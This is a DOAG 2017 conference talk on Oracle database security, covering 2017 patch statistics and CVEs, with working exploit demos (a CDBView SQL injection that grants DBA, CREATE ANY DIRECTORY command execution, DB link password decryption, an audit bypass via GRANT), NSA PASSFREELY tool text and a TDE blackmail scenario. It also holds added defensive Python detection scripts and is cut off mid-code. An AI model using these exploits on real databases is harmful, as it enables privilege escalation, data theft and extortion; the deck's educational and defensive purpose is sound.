DOAG BEST OF 2017 · 2018-11-25 · Oracle Security Patches ! Krieg… ! Outlook 2018. Database...
Introduction
What will be shown in the next 45 minutes?
• Oracle Security Patches
• Krieg…
• Outlook 2018
Database Vulnerabilities and CPU
Again the patch situation is much better (down from 30 in 2016 to 14 in 2017)
Problem: At the moment only a few people are looking for security bugs in the database
Nowadays it’s rare that exploit code for databases is published
In 2017 prices for exploits went down
Jul 2017 CVE-2017-10202
https://vuldb.com/?id.103781
Current Price Estimation: $25k-$100k (0-day) / $5k-$25k (Today)
Oracle Vulnerabilities 2017
Number of vulnerabilities in Oracle database reduced again
• 14 findings in 2017 (2016: 30, 2015: 29, 2014: 43, 2013: 13, 2012: 17)
• 4 remote exploitable bugs (2016: 8, 2015: 3, 2014: 4, 2013: 7, 2012: 8)
• January 2017 CPU (2 Vulnerabilities – 0 remote)
• April 2017 CPU (2 Vulnerabilities – 0 remote)
• July 2017 CPU (4 Vulnerabilities – 2 remote)
• October 2017 CPU (6 Vulnerabilities – 2 remote)
Dec 2016
Oracle 12.1 Exploit
* https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/
Oracle 12.1 Exploit I
SQL> conn doag2017/doag2017
Connect durchgeführt.
SQL> select granted_role from user_role_privs;
CONNECT EXECUTE_CATALOG_ROLE
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
Oracle 12.1 Exploit II
SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;
1
SQL> select granted_role from user_role_privs;
CONNECT DBA EXECUTE_CATALOG_ROLE
January 2017
Oracle CPU January 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
January 2017 CPU*
2 security fixes (No remote exploitable)
1 OJVM (CVSS 9.0)
1 RDBMS (CVSS 3.3)
March 2017
Blog Entry: „Create any directory“=DBA=SYSDBA ! Ouch*
Blog Entry: CREATE ANY DIRECTORY threats : PDBs and the PATH_PREFIX clause**
Reverse engineering DB Link password decryption in PL/SQL***
* https://mahmoudhatem.wordpress.com/2017/03/03/create-any-directorydbasysdba-ouch/
** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017
*** https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/
Exploit - Create any directory I
declare
  v_file utl_file.file_type;
begin
  v_file := utl_file.fopen('TEMP_DIR','execute_me.sh','w');
  utl_file.put_line(v_file,'export PATH=/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin');
  utl_file.put_line(v_file,'export ORACLE_HOME=/oracle11/product/11.2.0/dbhome_1');
  utl_file.put_line(v_file,'export ORACLE_SID=testdb');
  utl_file.put_line(v_file,'export PATH=$ORACLE_HOME/bin:$PATH');
  utl_file.put_line(v_file,'ps -ef | grep pmon');
  utl_file.fclose(v_file);
end;
/
Exploit - Create any directory II
CREATE TABLE exec_command (
  txt varchar2(4000)
)
ORGANIZATION EXTERNAL (
  TYPE ORACLE_LOADER
  DEFAULT DIRECTORY temp_dir
  ACCESS PARAMETERS (
    RECORDS DELIMITED BY NEWLINE
    PREPROCESSOR exec_dir:'bash'
    FIELDS TERMINATED BY ','
    MISSING FIELD VALUES ARE NULL
    ( txt )
  )
  LOCATION ('execute_me.sh')
);
Escape from PDB without PATH_PREFIX
The CREATE ANY DIRECTORY privilege can be used to escape from a PDB. Oracle 12.1 introduced the PATH_PREFIX clause to prevent this attack, but it was not enforced in 12.1.
** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017
PDB without PATH_PREFIX
SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';
Pluggable database created.
SQL> alter session set container=pdb_prefix;
Session altered.
SQL> create directory temp_dir as '/tmp';
ORA-65254: invalid path specified for the directory
SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /
PL/SQL procedure successfully completed.
ll /
-rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh
PDB with PATH_PREFIX
SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';
Pluggable database created.
SQL> alter session set container=pdb_prefix;
Session altered.
SQL> create directory temp_dir as '/tmp';
ORA-65254: invalid path specified for the directory
SQL> create directory temp_dir as 'tmp';
Directory created.
SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /
PL/SQL procedure successfully completed.
ll /oracle/path_prefix
-rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh
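Because the demo above shows that 12.1 could let a directory object reach outside PATH_PREFIX, a defender should not trust the database to have enforced the prefix. The following is an added example (not code from the talk or from the cited blog posts): it resolves every DBA_DIRECTORIES path itself, flags the ones that escape the prefix (absolute paths, "../" traversal, and look-alike prefixes), and lists grantees of CREATE ANY DIRECTORY that are not on an approved list. The rows and the approved list are constructed assumptions.

```python
"""Re-check directory objects against a PDB's PATH_PREFIX (added example).

Not code from the talk or the cited blog. The checks resolve each directory
path themselves instead of trusting the database, and list who holds
CREATE ANY DIRECTORY. Rows are constructed to look like DBA_DIRECTORIES
and DBA_SYS_PRIVS.
"""
import posixpath


def resolve_directory_path(path_prefix, directory_path):
    """Absolute OS path a directory object points to.
    A relative DIRECTORY_PATH is resolved under PATH_PREFIX (the intended
    behaviour); an absolute one is taken as written, which is exactly how
    a directory can escape the prefix."""
    if directory_path.startswith("/"):
        return posixpath.normpath(directory_path)
    return posixpath.normpath(posixpath.join(path_prefix, directory_path))


def is_under_prefix(path_prefix, resolved):
    """True only for the prefix itself or a path below it; a string prefix
    such as /oracle/path_prefix_other must not pass as /oracle/path_prefix."""
    prefix = posixpath.normpath(path_prefix)
    return resolved == prefix or resolved.startswith(prefix + "/")


def find_escaping_directories(path_prefix, directories):
    """directories: (DIRECTORY_NAME, DIRECTORY_PATH) rows.
    Returns (name, resolved_path) for every directory outside PATH_PREFIX."""
    findings = []
    for name, dpath in directories:
        resolved = resolve_directory_path(path_prefix, dpath)
        if not is_under_prefix(path_prefix, resolved):
            findings.append((name, resolved))
    return findings


def unexpected_directory_grantees(sys_privs, approved):
    """sys_privs: (GRANTEE, PRIVILEGE) rows; approved: grantees allowed to
    hold CREATE ANY DIRECTORY (assumption: an inventory the DBA maintains)."""
    return sorted(g for g, p in sys_privs
                  if p.upper() == "CREATE ANY DIRECTORY" and g.upper() not in approved)


# Constructed sample rows (not from a real database).
SAMPLE_DIRECTORIES = [
    ("DATA_PUMP_DIR", "dpdump"),                    # relative, stays inside the prefix
    ("TEMP_DIR", "tmp"),                            # relative, stays inside the prefix
    ("ESCAPE_DIR", "/tmp"),                         # absolute path outside the prefix
    ("DOTDOT_DIR", "../../tmp"),                    # traversal out of the prefix
    ("SNEAKY_DIR", "/oracle/path_prefix_other/x"),  # string-prefix match, different tree
]
SAMPLE_SYS_PRIVS = [
    ("DBA", "CREATE ANY DIRECTORY"),
    ("APP_USER", "CREATE ANY DIRECTORY"),
    ("APP_USER", "CREATE SESSION"),
]
APPROVED_DIRECTORY_GRANTEES = {"DBA"}

if __name__ == "__main__":
    for name, path in find_escaping_directories("/oracle/path_prefix/", SAMPLE_DIRECTORIES):
        print(f"{name} -> {path} is outside PATH_PREFIX")
    for grantee in unexpected_directory_grantees(SAMPLE_SYS_PRIVS, APPROVED_DIRECTORY_GRANTEES):
        print(f"{grantee} holds CREATE ANY DIRECTORY without approval")
```

Feed it the real rows from DBA_DIRECTORIES and DBA_SYS_PRIVS of each PDB; the path logic is the same one a file system applies, so a directory that passes here cannot be used to write outside the prefix through UTL_FILE or an external table.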
Short history of DB Link Passwords*
<=10.2 Select password from sys.link$;
<=11.2.0.3 select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$;
** https://blogs.loopback.org/2014/06/db-link-passworter-metadaten-in-11-2-0-4/
Database Link Passwords 11.2-12.2
SELECT VALUE$ FROM SYS.PROPS$ WHERE name = 'NO_USERID_VERIFIER_SALT';
readelf -s oracle | grep ztcshpl_v6
112105: 0000000010b9ee40 16384 OBJECT LOCAL DEFAULT 29 ztcshpl_v6
Run script db_link_password_decrypt.sql. **
exec db_link_password_decrypt('17B21F905CE739E2759E6FB99745650E','076C8B8463098676E408141A154CF4C20AAF19A52CF7FEF3CD8A99830A82F9D8F129665C2F395DF4F30EBE15E48D78096E9BD8AC1012D24525982CE3C828BE298EA798D6FBD8A18379DEE803692B773B86570AB2DA90EA121124D6D0F228818D18812B42C77AE6D0F4BF257627643EEC34FB9A6C2EF6185D7302EF30673A2F4C');
* https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/
** https://github.com/hatem-mahmoud/scripts/blob/master/db_link_password_decrypt.sql
April 2017
Oracle CPU April 2017*
PassFreely Attack Bypasses Oracle Database Authentication**
Shadow Brokers released toolset from the Equation Group aka. NSA
* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
** https://www.bankinfosecurity.com/passfreely-attack-bypasses-oracle-database-authentication-a-9868
April 2017 CPU*
2 security fixes (0 remote exploitable)
1 SQL*Plus (CVSS 7.2)
1 OJVM (CVSS 5.3)
Shadow Brokers & NSA
On April 8th, 2017, The Shadow Brokers published the password for an encrypted dump. The dump contains several tools and exploits from the NSA; some of these exploits were used in later attacks worldwide (e.g. WannaCry). Some of the tools affect databases (Oracle, SQL Server, SQLite). The collection can be analyzed at https://github.com/misterch0c/shadowbroker
https://www.mnemonic.no/no/nyheter/2017/advisory---data-leakage-of-multiple-0-days-and-tools/
Some features of the NSA Toolkit
Oracle (Hacking) Plugins
• Disable Authentication using PASSFREELY (passwords are no longer checked); supported from Oracle 7.2.2.4.0 to the latest version
• Disable Oracle Auditing to avoid traces
• Backdoor (?) - Oracle_Implant.dll
• Connection String Wizard
• Run a standard query
• Read the top 10 rows from every table
• Run a folder of queries
• Write Results to CSV
• Unicode support for foreign languages
• …
Already seen before at the DOAG conference
• Disable Oracle Authentication (Best of Oracle Security 2011)
• Disable Oracle Auditing to avoid traces (Best of Oracle Security 2013)
• Backdoor (?) - Oracle_Implant.dll (Oracle Rootkits – eine neue Gefahr für Datenbanken?)
User friendly
Oracle can log in: 1) the Windows Application Event Logs 2) the listener.log file 3) its internal auditing mechanisms (including the Enterprise Manager console)
We're going to check the first two, but we can't run the detailed auditing check (#3) until you connect to the database.
Once this is finished, connect and run the Detailed Audit Check Query Plan!
Sound good?
Audit check complete, don't forget to run the Detailed Audit Check query plan after you connect!
If you'd like to disable auditing or enable PASSFREELY select one of the options below. Otherwise continue by pressing 0:
Run 'audit -disable all'
Run PASSFREELY (oracle -memcheck && oracle -open)
If you'd like to reenable auditing or remove PASSFREELY select one of the options below. Otherwise continue by pressing 0:
User friendly
Any 'sys' logins will be logged even if using PASSFREELY! You'd better know what you're doing!
Are you sure you'd like to run 'audit -disable all'? (Make sure you don't have security auditing dorked!)
audit -disable all
DISABLING AUDITING FAILED!!! GO GET HELP!
User friendly
Run the "oracle -memcheck" command to make sure that we can exploit this database.
Run the "oracle -crc" command to determine version
PROBLEM FOUND! There is an unknown version of Oracle running on the box!\n It could be that you just need an updated version of PASSFREELY. If not, you should grab the Oracle symbol file and executable that failed the CRC check above! OK, that wasn't it or at least I couldn't fix the problem. It could be that this is an unknown version of Oracle (verify that the CRC identified a version string) If the version isn't identified, then that is the problem, otherwise the problem is with PASSFREELY itself, so please contact the developer!
If the version is unknown, you should bring back the Oracle executable and the associated symbol file so that it can be incorporated it into this plugin.
User friendly
You need to look over the file we just downloaded before proceeding! At a minimum you should review the section: Database Usage by User and Tablespace You should also check to see if there are Partitioned tables for any users of interest.
Do you want to survey the database users
Type of data sample
1 - Sample using Table Partitions
2 - Sample using Table Partitions without Row Counts
3 - Sample without using Table Partitions
4 - Sample without using Table Paritions and without Row Counts
5 - Just get Row Counts and Table Descriptions
Enter the number of the type of data sample you want
User friendly
Do you have cracked passwords for a user of interest (OR for the SYS or SYSTEM user)? Do you want to perform database exports for any users? Are you wanting to include the Constraints and Indexes in the export file? (You probably only want this if exporting everything) What is the name of the user you want to export? Do you have the password for this user ($expuser)?
Done with database exports. Waiting for all files to complete downloading before continuing. Done. Do you want to delete the copy of $sidchoice\_Passwords_To_Crack.txt that is in the directory $tempDownloadDirPath?
Done with the Oracle survey ... that was easy!
Passfreely Supported versions
• Oracle Database v 7.2.2.4.0
• Oracle Database v 7.3.2.2.0
• Oracle Database v 7.3.2.3.15
• Oracle Database v 7.3.3.0.0
• Oracle Database v 7.3.3.5.3
• Oracle Database v 7.3.3.6.0
• Oracle Database v 7.3.4.0.0
• Oracle Database v 7.3.4.4.0
• Oracle Database v 7.3.4.5.0
• Oracle Database v 7.3.4.5.2
• Oracle Database v 8.0.3.0.0
• Oracle Database v 8.0.3.2.3
• Oracle Database v 8.0.4.0.0
• Oracle Database v 8.0.4.0.1
• Oracle Database v 8.0.4.3.5
• Oracle Database v 8.0.4.3.8
• Oracle Database v 8.0.4.4.0
• Oracle Database v 8.0.4.4.1
• Oracle Database v 8.0.5.0.0
• …
• Oracle Database v 11.1.0.7
• Oracle Database v 11.1.0.7 Patch 1
• Oracle Database v 11.1.0.7 Patch 10
• Oracle Database v 11.1.0.7 Patch 11
• Oracle Database v 11.1.0.7 Patch 12
• Oracle Database v 11.1.0.7 Patch 13
• Oracle Database v 11.1.0.7 Patch 14
• Oracle Database v 11.1.0.7 Patch 15
• Oracle Database v 11.1.0.7 Patch 16
• Oracle Database v 11.1.0.7 Patch 17
• Oracle Database v 11.1.0.7 Patch 2
• Oracle Database v 11.1.0.7 Patch 3
• Oracle Database v 11.1.0.7 Patch 4
• Oracle Database v 11.1.0.7 Patch 5
• Oracle Database v 11.1.0.7 Patch 6
• Oracle Database v 11.1.0.7 Patch 7
• Oracle Database v 11.1.0.7 Patch 8
• Oracle Database v 11.1.0.7 Patch 9
• Oracle Database v 11.2.0.1 Base - 64-bit
• Oracle Database v 11.2.0.1 Patch 7 - 64-bit
• Oracle Database v 11.2.0.2 Base - 64-bit
Countermeasures
• Do not rely on standard auditing methods (e.g. Oracle Auditing)
• Certain access patterns (password hashes in sys.user$) and certain tools (e.g. exp) used without a ticket should be logged and analyzed
• Minimize the number of services on your Oracle database server
• SYS/SYSTEM access to application data should be monitored
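The three "log and analyze" items above translate directly into detection rules. The block below is an added example, not from the talk: it runs those rules over audit records (reads of password hashes in SYS.USER$, export tools run by an OS user without a change ticket, and SYS/SYSTEM sessions touching application schemas). The AuditRecord fields mirror a handful of audit-trail columns; the sample records, the application schema list and the ticket lookup are constructed assumptions.

```python
"""Flag access patterns that should be logged and analysed (added example,
not from the talk). Rules: reads of password hashes in SYS.USER$, export
tools (exp/expdp) run without a change ticket, and SYS/SYSTEM sessions
touching application schemas. Records, schema list and ticket lookup are
constructed assumptions."""
from dataclasses import dataclass


@dataclass
class AuditRecord:
    username: str        # database user of the session
    os_user: str         # OS user on the client
    client_program: str  # client program name, e.g. 'expdp@dbhost (TNS V1-V3)'
    action: str          # action name, e.g. 'SELECT'
    owner: str           # schema of the object touched
    obj_name: str        # object touched
    sql_text: str


APP_SCHEMAS = {"HR", "SALES"}        # assumption: the application schemas
EXPORT_TOOLS = {"exp", "expdp"}      # Oracle export utilities
HASH_OBJECTS = {("SYS", "USER$")}    # where password hashes live


def program_basename(client_program):
    """'expdp@dbhost (TNS V1-V3)' -> 'expdp', 'C:\\app\\exp.exe' -> 'exp'."""
    name = client_program.split("@", 1)[0].split(" ", 1)[0]
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    if name.lower().endswith(".exe"):
        name = name[:-4]
    return name.lower()


def detect(records, ticketed_os_users):
    """ticketed_os_users: OS users with an approved change ticket (assumed to
    come from the ticketing system). Returns (rule, db_user, detail) tuples."""
    alerts = []
    for r in records:
        if (r.owner.upper(), r.obj_name.upper()) in HASH_OBJECTS and r.action.upper() == "SELECT":
            alerts.append(("HASH_ACCESS", r.username, r.sql_text))
        if program_basename(r.client_program) in EXPORT_TOOLS and r.os_user not in ticketed_os_users:
            alerts.append(("EXPORT_WITHOUT_TICKET", r.username, r.client_program))
        if r.username.upper() in {"SYS", "SYSTEM"} and r.owner.upper() in APP_SCHEMAS:
            alerts.append(("ADMIN_TOUCHES_APP_DATA", r.username, f"{r.owner}.{r.obj_name}"))
    return alerts


SAMPLE_RECORDS = [  # constructed, not real audit data
    AuditRecord("ANALYST1", "jdoe", "sqlplus@ws01 (TNS V1-V3)", "SELECT", "SYS", "USER$",
                "select * from sys.user$"),
    AuditRecord("APPADMIN", "appadmin", "expdp@dbhost (TNS V1-V3)", "SELECT", "HR", "EMPLOYEES",
                "SELECT * FROM HR.EMPLOYEES"),
    AuditRecord("SYSTEM", "oracle", "sqlplus@dbhost (TNS V1-V3)", "SELECT", "HR", "SALARIES",
                "select * from hr.salaries"),
    AuditRecord("HR", "hr", "JDBC Thin Client", "UPDATE", "HR", "EMPLOYEES",
                "update hr.employees set salary = salary"),
    AuditRecord("BACKUP", "backup", "C:\\app\\exp.exe", "SELECT", "SALES", "ORDERS",
                "select * from sales.orders"),
]

if __name__ == "__main__":
    for rule, user, detail in detect(SAMPLE_RECORDS, ticketed_os_users={"backup"}):
        print(f"{rule}: {user} ({detail})")
```

With the ticketed set {"backup"} the fourth record (normal application DML) and the fifth (a ticketed export) stay silent; the first three raise one alert each. The same rules can be pointed at unified audit rows or at a SIEM feed built from them.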
July 2017
Oracle CPU July 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
July 2017 CPU*
4 security fixes (2 remote exploitable)
1 OJVM (CVSS 9.9)
1 DBMS_LDAP (CVSS 6.8, remote)
1 RAC (CVSS 6.8, remote)
1 RDBMS Security (CVSS 1.9)
Jul 2017 CVE-2014-3566
Problem: A security vulnerability affecting SSL v3.0 was recently publicly disclosed (Padding Oracle On Downgraded Legacy Encryption, or “Poodle”). This security vulnerability is the result of a design flaw in SSL v3.0. Note that this vulnerability does not affect TLS and is limited to SSL 3.0, which is widely considered as an obsolete protocol. This vulnerability has received the identifier CVE-2014-3566.
Reporter: Karthik Bhargavan and Gaetan Leurent
https://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html
Jul 2017 CVE-2016-2183
Problem: Karthik Bhargavan and Gaetan Leurent have unveiled a new attack on Triple-DES, SWEET32, Birthday attacks on 64-bit block ciphers in TLS and OpenVPN. It has been assigned CVE-2016-2183.
Reporter: Karthik Bhargavan and Gaetan Leurent
https://www.openssl.org/blog/blog/2016/08/24/sweet32/
September 2017
Hacker attacks hit more than 27,000 MongoDB databases*
https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html
Encrypting Databases
• Escalate privileges to DBA
• Enable TDE with an ALTER SYSTEM command
• Encrypt important data (e.g. from business transactions). Because TDE is transparent, the application does not detect the change
• Close the wallet after one week via a database job and send an email to the CEO...
• Depending on the backup concept of the database, the important data is encrypted and only accessible if you can open the wallet. The wallet password is not known to the DBA, only to the blackmailer
Attacking Databases with Oracle TDE
Red-Database-Security GmbH
Abusing TDE for Blackmailing
1. Hacker logs into the database
2. Become DBA
3. Create a wallet
4. Encrypt tables
5. Inform customer after shutdown
Data is still there but encrypted. And the keys are in the wallet.
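Each step of the scenario leaves a trace that can be baselined: a wallet that appears or changes state, tablespaces or columns that become encrypted without a ticket, and, as the end state, encrypted data with a wallet that is no longer open. The following is an added example (not from the talk) that compares two polls of that state. The snapshot dicts are constructed to resemble what V$ENCRYPTION_WALLET, V$ENCRYPTED_TABLESPACES and DBA_ENCRYPTED_COLUMNS would return; the baseline is assumed to be kept outside the database, since a DBA cannot reopen a wallet whose password is unknown.

```python
"""Detect TDE being turned against the database owner (added example, not
from the talk). Compares a baseline snapshot of the TDE state with the
current one. Snapshots are constructed dicts resembling V$ENCRYPTION_WALLET,
V$ENCRYPTED_TABLESPACES and DBA_ENCRYPTED_COLUMNS output."""


def diff_tde_state(baseline, current, approved_objects=frozenset()):
    """Return (rule, detail) alerts for changes between two snapshots.
    Snapshot keys: wallet_status, wallet_location, encrypted_tablespaces
    (set of names), encrypted_columns (set of 'OWNER.TABLE.COLUMN').
    approved_objects: objects that a change ticket allowed to be encrypted."""
    alerts = []
    if current["wallet_status"] != baseline["wallet_status"]:
        alerts.append(("WALLET_STATUS_CHANGED",
                       f'{baseline["wallet_status"]} -> {current["wallet_status"]}'))
    if current["wallet_location"] != baseline["wallet_location"]:
        alerts.append(("WALLET_LOCATION_CHANGED", current["wallet_location"]))
    for ts in sorted(current["encrypted_tablespaces"] - baseline["encrypted_tablespaces"]):
        if ts not in approved_objects:
            alerts.append(("NEW_ENCRYPTED_TABLESPACE", ts))
    for col in sorted(current["encrypted_columns"] - baseline["encrypted_columns"]):
        if col not in approved_objects:
            alerts.append(("NEW_ENCRYPTED_COLUMN", col))
    # The blackmail end state: encrypted data exists but the wallet is not open,
    # so the data cannot be read until someone supplies the wallet password.
    has_encrypted_data = bool(current["encrypted_tablespaces"] or current["encrypted_columns"])
    if has_encrypted_data and current["wallet_status"] != "OPEN":
        alerts.append(("ENCRYPTED_DATA_WALLET_NOT_OPEN", current["wallet_status"]))
    return alerts


# Constructed snapshots (not from a real database).
BASELINE = {  # TDE never set up on this database
    "wallet_status": "NOT_AVAILABLE", "wallet_location": "",
    "encrypted_tablespaces": set(), "encrypted_columns": set(),
}
WEEK_ONE = {  # a wallet exists and data has been encrypted, no ticket
    "wallet_status": "OPEN", "wallet_location": "/u01/app/oracle/admin/testdb/wallet",
    "encrypted_tablespaces": {"USERS"}, "encrypted_columns": {"SALES.ORDERS.CARD_NO"},
}
WEEK_TWO = dict(WEEK_ONE, wallet_status="CLOSED")  # the scheduled job closed the wallet

if __name__ == "__main__":
    for label, before, after in (("week 1", BASELINE, WEEK_ONE), ("week 2", WEEK_ONE, WEEK_TWO)):
        for rule, detail in diff_tde_state(before, after):
            print(f"{label}: {rule} {detail}")
```

The first poll already produces four alerts (wallet appeared, wallet location set, tablespace and column encrypted), a week before the wallet is closed; by the time ENCRYPTED_DATA_WALLET_NOT_OPEN fires, the unencrypted backups from before week one are what still matters.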
October 2017
Oracle CPU October 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
October 2017 CPU*
6 security fixes (2 remote exploitable)
1 Core RDBMS (CVSS 8.8)
1 Spatial (Apache Groovy) (CVSS 8.3, remote)
1 Java VM (CVSS 8.2)
1 WLM (Apache Tomcat) (CVSS 8.1, remote)
1 XMLDB (CVSS 6.5)
1 RDBMS Security (CVSS 2.3)
Oct 2017 CVE-2017-10292
Problem: Creating users with the GRANT command is not audited by „AUDIT CREATE USER“
Reporter: David Litchfield
Exploit:
GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1
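Because one audit option misses this form of account creation, the defender's answer is not to trust a single option: reconcile the accounts that exist against the CREATE USER events actually recorded, and separately flag any GRANT that carries an IDENTIFIED BY clause. The block below is an added example, not from the talk or the advisory; it assumes GRANT statements themselves are audited (traditional AUDIT SYSTEM GRANT / AUDIT ROLE, or a unified audit policy covering GRANT) so that their SQL text is available, and all rows are constructed.

```python
"""Reconcile accounts against the audit trail (added example, not from the
talk). CVE-2017-10292: AUDIT CREATE USER does not record an account created
with GRANT ... TO new_user IDENTIFIED BY ..., so compare DBA_USERS-style
rows with recorded CREATE USER events and flag GRANTs with IDENTIFIED BY.
Assumes GRANT statements are audited; all rows are constructed."""
from datetime import datetime, timedelta
import re

# GRANT ... TO <grantee> IDENTIFIED BY ... (the form used in the exploit above)
GRANT_WITH_PASSWORD = re.compile(
    r'^\s*GRANT\b.*?\bTO\s+("?[A-Za-z0-9_$#]+"?)\s+IDENTIFIED\s+BY\b',
    re.IGNORECASE | re.DOTALL,
)


def users_without_create_audit(users, audit_rows, since, slack=timedelta(minutes=5)):
    """users: (USERNAME, CREATED) rows; audit_rows: (ACTION_NAME, OBJ_NAME,
    TIMESTAMP, SQL_TEXT) rows. Returns accounts created at or after `since`
    for which no CREATE USER audit record exists within `slack` of CREATED."""
    create_events = {}
    for action, obj, ts, _sql in audit_rows:
        if action.upper() == "CREATE USER":
            create_events.setdefault(obj.upper(), []).append(ts)
    missing = []
    for name, created in users:
        if created < since:
            continue  # outside the audit retention window being checked
        stamps = create_events.get(name.upper(), [])
        if not any(abs(created - ts) <= slack for ts in stamps):
            missing.append(name)
    return missing


def grants_with_password(audit_rows):
    """Return (grantee, sql_text) for GRANT statements that carry IDENTIFIED BY;
    routine administration has little use for this clause, so each hit is
    worth a look regardless of whether the account already existed."""
    hits = []
    for _action, _obj, _ts, sql in audit_rows:
        m = GRANT_WITH_PASSWORD.match(sql or "")
        if m:
            hits.append((m.group(1).strip('"').upper(), sql))
    return hits


T0 = datetime(2017, 10, 18, 9, 0, 0)
SAMPLE_USERS = [  # constructed DBA_USERS rows
    ("SCOTT", T0 - timedelta(days=400)),          # old account, outside the window
    ("APP_USER", T0),                             # created normally and audited
    ("OOPSIEDAISY", T0 + timedelta(minutes=10)),  # created via GRANT, no CREATE USER record
]
SAMPLE_AUDIT = [  # constructed audit-trail rows
    ("CREATE USER", "APP_USER", T0 + timedelta(seconds=2), 'CREATE USER app_user IDENTIFIED BY "x"'),
    ("GRANT ROLE", "DBA", T0 + timedelta(minutes=10), "GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1"),
    ("GRANT ROLE", "CONNECT", T0 + timedelta(minutes=12), "GRANT CONNECT TO app_user"),
]

if __name__ == "__main__":
    window_start = T0 - timedelta(days=1)
    print("accounts without CREATE USER audit:",
          users_without_create_audit(SAMPLE_USERS, SAMPLE_AUDIT, since=window_start))
    print("grants carrying a password:", grants_with_password(SAMPLE_AUDIT))
```

The reconciliation catches the new account even if the GRANT itself was never audited, because it starts from the account list; the regex rule catches the statement when it was.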
Oct 2017 CVE-2016-6814
Problem: It was found that a flaw in the Apache Groovy library allows remote code execution wherever deserialization occurs in the application. It is possible for an attacker to craft a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects are subject to this vulnerability.
Reporter: Sam Thomas
Oct 2017 CVE-2016-8735
Problem: The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.
Reporter: Pierre Ernst
http://seclists.org/oss-sec/2016/q4/502
http://blog.safebuff.com/2016/12/05/Apache-Tomcat-Remote-Code-Execution-CVE-2016-8735/
November 2017
DOAG 2017
Blog Entry „Injecting a Backdoor in an Oracle database“ *
* https://mahmoudhatem.wordpress.com/2017/11/17/injecting-a-backdoor-in-an-oracle-database/#more-8100 ** https://yurichev.com/writings/oracle.pdf
First rename the original function “snttread” to “Snttread” in the object file “sntt.o”, then inject a new wrapper function named “snttread” into the library “lib/libntcp12.a” which does all the amazing stuff if it detects the magic word, in this case “/bin/sh”.
Findings from Security Audits in 2017
• Weak passwords
• Cleartext passwords in audit logs
• Privilege escalation via CREATE INDEX privilege (already shown in 2016)
• Too many privileges
• …
Cleartext passwords in Oracle audit log
Sometimes the Oracle audit log contains cleartext passwords. Review the content of audit.log to identify and remove the passwords.
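Reviewing audit files by hand does not scale, so the following added example (not code from the talk) does the review: it scans audit text for the statement forms that most often carry a password in SQL text (CREATE USER, ALTER USER, GRANT and CREATE DATABASE LINK with IDENTIFIED BY, and a SQL*Plus CONNECT user/password line), reports each hit with its line number, and writes a redacted copy that keeps the statement but not the password. IDENTIFIED BY VALUES carries a hash rather than a cleartext password and is left alone. The sample entries are constructed, not taken from a real audit.log.

```python
"""Find and redact cleartext passwords in an Oracle audit log (added
example, not from the talk). Patterns cover IDENTIFIED BY clauses and a
SQL*Plus CONNECT user/password line; IDENTIFIED BY VALUES '<hash>' is
skipped. The sample log entries are constructed."""
import re

PASSWORD_PATTERNS = [
    # IDENTIFIED BY "quoted" or IDENTIFIED BY bareword (not IDENTIFIED BY VALUES)
    re.compile(r'(IDENTIFIED\s+BY\s+)(?!VALUES\b)("[^"]*"|[^\s;\'"]+)', re.IGNORECASE),
    # CONNECT user/password[@service] as typed into SQL*Plus
    re.compile(r'(\bCONN(?:ECT)?\s+[A-Za-z0-9_$#"]+/)([^\s@;]+)', re.IGNORECASE),
]


def find_passwords(text):
    """Return (line_no, pattern_index, password) for every cleartext password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for idx, pattern in enumerate(PASSWORD_PATTERNS):
            for m in pattern.finditer(line):
                findings.append((lineno, idx, m.group(2)))
    return findings


def redact(text, mask="<REDACTED>"):
    """Return the text with each password replaced by mask; the statement
    itself is kept so the audit record stays useful."""
    for pattern in PASSWORD_PATTERNS:
        text = pattern.sub(lambda m: m.group(1) + mask, text)
    return text


def redact_file(src, dst):
    """Write a redacted copy of an audit file and return what was found.
    Assumes a plain-text audit file; keep the original on write-once media
    if your retention rules require it."""
    with open(src, encoding="utf-8", errors="replace") as f:
        content = f.read()
    with open(dst, "w", encoding="utf-8") as f:
        f.write(redact(content))
    return find_passwords(content)


# Constructed sample, loosely shaped like the OS audit file format.
SAMPLE_AUDIT_LOG = """\
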